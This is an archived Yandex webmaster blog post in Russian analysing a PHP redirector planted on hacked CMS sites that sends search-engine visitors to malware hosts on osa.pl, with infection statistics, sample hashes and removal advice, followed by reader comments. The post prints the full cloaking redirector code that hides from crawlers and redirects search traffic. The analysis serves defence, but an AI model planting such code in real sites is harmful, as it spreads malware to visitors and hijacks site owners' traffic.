Блог Яндекса для вебмастеров

Про вредоносный редиректор на osa.pl

Пост в архиве.
Злоумышленники нередко взламывают сайты для того, чтобы разместить на них "редиректоры" - ПО, которое автоматически перенаправляет браузер пользователя на подконтрольные злоумышленникам веб-серверы. В результате зараженный сайт становится частью системы распространения вредоносного кода. В опубликованной статье можно узнать о мерах, которые применяются к сайтам с таким кодом.

Злоумышленники нередко взламывают сайты для того, чтобы разместить на них редиректоры — ПО, которое автоматически перенаправляет браузер пользователя на подконтрольные злоумышленникам веб-серверы. В результате зараженный сайт становится частью их системы распространения вредоносного кода.


Когда Безопасный Поиск Яндекса обнаруживает такие редиректоры, к содержащим их сайтам применяются следующие меры:

  • В результатах поиска сайт отображается с пометкой о том, что он представляет опасность для пользователя, и количество переходов на него с поисковой выдачи снижается в 50-100 раз.
  • Браузеры, использующие Safe Browsing API Яндекса, также предупреждают пользователей, что страница представляет опасность, даже когда  переход на зараженный ресурс происходит не с поисковой выдачи. Это ещё сильнее снижает посещаемость сайта.
  • Если владельцы взломанного ресурса не устранили проблему, сайт совсем убирается из результатов поиска, т.к. постоянное перенаправление (редирект) на другой сайт, по сути, превращает этот ресурс в дорвей, который не даёт ответов на вопросы, задаваемые пользователями.

Подобные проблемы часто возникают из-за заражения скриптов популярных CMS веб-серверным вредоносным кодом. Наиболее популярным в настоящее время является следующий код:


error_reporting( 0 );
$qazplm=headers_sent(  );
if ( !$qazplm ) {
$referer = $_SERVER[ 'HTTP_REFERER' ];
$uag = $_SERVER[ 'HTTP_USER_AGENT' ];
if ( $uag and !stristr( $uag, "StackRambler" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "WebAlta" ) and
    !stristr( $uag, "aport" ) and
    !stristr( $uag, "compatible; Yandex" ) and
    !stristr( $uag, "dyatel" ) ) {
if ( stristr( $referer, "yandex" ) or
     stristr( $referer, "yahoo" ) or
     stristr( $referer, "google" ) or
     stristr( $referer, "bing" ) or
     stristr( $referer, "rambler" ) or
     stristr( $referer, "gogo" ) or
     stristr( $referer, "live" )  or
     stristr( $referer, "aport" ) or
     stristr( $referer, "nigma" ) or
     stristr( $referer, "webalta" ) or
     stristr( $referer, "meta.ua" ) or
     stristr( $referer, "bigmir.net" ) or
     stristr( $referer, "tut.by" ) or
     stristr( $referer, "ukr.net" ) or
     stristr( $referer, "poisk.ru" ) or
     stristr( $referer, "liveinternet.ru" ) or
     stristr( $referer, "gde.ru" ) or
     stristr( $referer, "quintura.ru" ) or
     stristr( $referer, "qip.ru" ) or
     stristr( $referer, "mail.ru" ) or
     stristr( $referer, "metabot.ru" ) ) {
     if ( !stristr( $referer, "cache" ) or
          !stristr( $referer, "inurl" ) ) {
              header( "Location: http://malwarehost/malwarepath/" );
              exit(  );
   }
  }
}
}

где:
  • malwarehost — хост, который распространяет вредоносное ПО;
  • malwarepath — директория на хосте, который распространяет вредоносное ПО.

Этот код обычно присутствует в PHP-файлах и может быть обфусцирован (закодирован).



Алгоритм работы вредоносного кода

  1. Сначала вызов функции error_reporting(0) отключает вывод ошибок при выполнении скрипта, так что даже если в веб-серверном вредоносном коде произойдет ошибка, то посетивший страницу пользователь ничего не увидит.
    Далее вызовом функции headers_sent(…) проверяется, был ли клиенту отправлен ответ с HTTP-заголовками. Если нет, то происходит получение Referer и User-Agent.
  2. После этого поиском соответствующей подстроки в значении User-Agent проверяется, не бот ли посещает страницу.
  3. Если это не бот, то проверяется, пришел ли он с одной из поисковых систем, приведенных ниже:

    www.yandex.ru;
    www.yahoo.com;
    www.google.com;
    www.bing.com;
    www.rambler.ru;
    www.gogo.ru;
    www.live.com;
    www.aport.ru;
    www.nigma.ru;
    www.webalta.ru;
    www.meta.ua;
    www.bigmir.net;
    www.tut.by;
    www.ukr.net;
    www.poisk.ru;
    www.liveinternet.ru;
    www.gde.ru;
    www.quintura.ru;
    www.qip.ru;
    www.mail.ru;
    www.metabot.ru

  4. Если пользователь перешёл на заражённый сайт с одной из указанных выше поисковых систем, и при этом он не просматривает сохранённую копию страницы в кэше поисковой системы, то выполняется перенаправление пользователя на сайт,  указанный в вызове функции header().


  5. Статистика распространения


    Всего Яндексу известно более 800 зараженных уникальных хостов, которые являются редиректорами на osa.pl. Пик распространения вредоносного кода пришелся на 20.09.2011. Общая динамика заражения приведена ниже:

    Чаще всего этот код находится на сайтах, доменное имя которых расположено в зоне RU:

    На домене osa.pl есть несколько поддоменов, которые являются промежуточными звеньями в цепочках распространения вредоносного кода. Статистика по использованию этих поддоменов такова:

    Сайты с некоторыми CMS заражают редиректорами на osa.pl чаще, чем другие:

    Распространяемое вредоносное ПО


    Вредоносное ПО, распространяемое через эти редиректы, на 28.09.2011 детектировали всего 4 антивируса из 43 (по данным VirusTotal.com).

    Хеши семпла:

    • MD5: c4d0e04e521dd8d920cb644b4075c6f0;
    • SHA1: 2fa568a42c04f6647fa5808bf8fdfd405aced9c3;
    • SHA256: 428262fa0edbee619df2913beaf0e22abcd6e67408db892bc275292526d3157f.


    Распространяемое вредоносное ПО часто представляет собой фальшивый антивирус. Для автоматического запуска во время загрузки ОС оно прописывает себя в ветку реестра: 

    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce


    Пользовательский интерфейс этого фальшивого антивируса выглядит так:



    Никакого отношения к настоящим антивирусам данное вредоносное ПО, разумеется, не имеет.


    Рекомендации


    Рекомендации по обеспечению безопасности вашего сайта аналогичны приведённым в предыдущей статье.

    Кроме того, обязательно проверяйте свой сайт на наличие вредоносного кода в auto_prepend_file и конструкции, связанные с обработкой ошибок.

    Команда безопасного поиска Яндекса


3 комментария
И это правильно! а то достали уже эти сайты!
Пастухов Василий Романович
19 января 2016, 11:24

А нельзя блокировать именно этот код

Владелец сайта не виноват в том что этот код оказался на его сайте

Нужно просто не индексировать часть сайта с этими страницами и не уменьшать рейтинг сайта!

А может быть лучше всего будет если Яндекс закрыть ? Так как интернет станет на много чище, спросите почему ? Откуда Вы знаете, что все эти злоумышленники подкинуты не Вами ? спросите причем Вы ? Ок, постараюсь ответить: моему сайту уже пятый год и он всегда был в поиске но, вот уже как пару месяцев Яндекс решил, что мой сайт ему уже не нужен, так что мне дальше делать ? может быть мне тоже распространять вирусы ? я конечно этого делать не хочу и не буду но я уверен, что таких как я очень много и откуда у Вас Яндексов такая уверенность, что большинство из этих кинутых вами вебмастеров не начнут распространять вирусы ? потому, что после того как мы день и ночь потели над своими сайтами и выращивали его с каждым годом Вы вдруг решили поиздеваться над вебмастерами (Что бы делал бы Яндекс, если бы небыло бы сайтов ?) и новые сайты создавать после этого совсем не хочется и тогда ТОЛЬКО приходит в голову делать все эти черные дела (дорвеи, вирусы и прочее...).

Вы вообще проверяете сайты когда Вам пишут в поддержку ? Я Вам пишу письмо по поводу своего сайта и Вы мне шлете ответное с ссылками по поводу "popunder, clickunder и bodyclick" - сайт с самого рождения не имел реклам этих видов и чё Вы мне шлете свое стандартное письмо ? за место того, чтобы открыть сайт и глаза и прислать четкий ответ!

 

Вывод: За вашими плечами много раздраженных вебмастеров и которые готовы запускать не только вирусы и поэтому следует закрывать Яндекс, чтобы злых вебмастеров было бы меньше и интернет был бы на много чище или, не нужно, пожалуйста, издеваться над вебмастерами, цените своих вебмастеров и поверьте, что интернет будет намного чище, если Вы не отпустите еще одного любого раздраженного вебмастера и ценить их нужно не так как Вы пишите, что Вы делаете всё для пользователя а на самом деле, я смогу показать пачку запросов по которым Яндекс выдасть сайты совсем не для пользователя!

 

Вот, помоемому я всё Вам высказал, всё что у меня собралось :)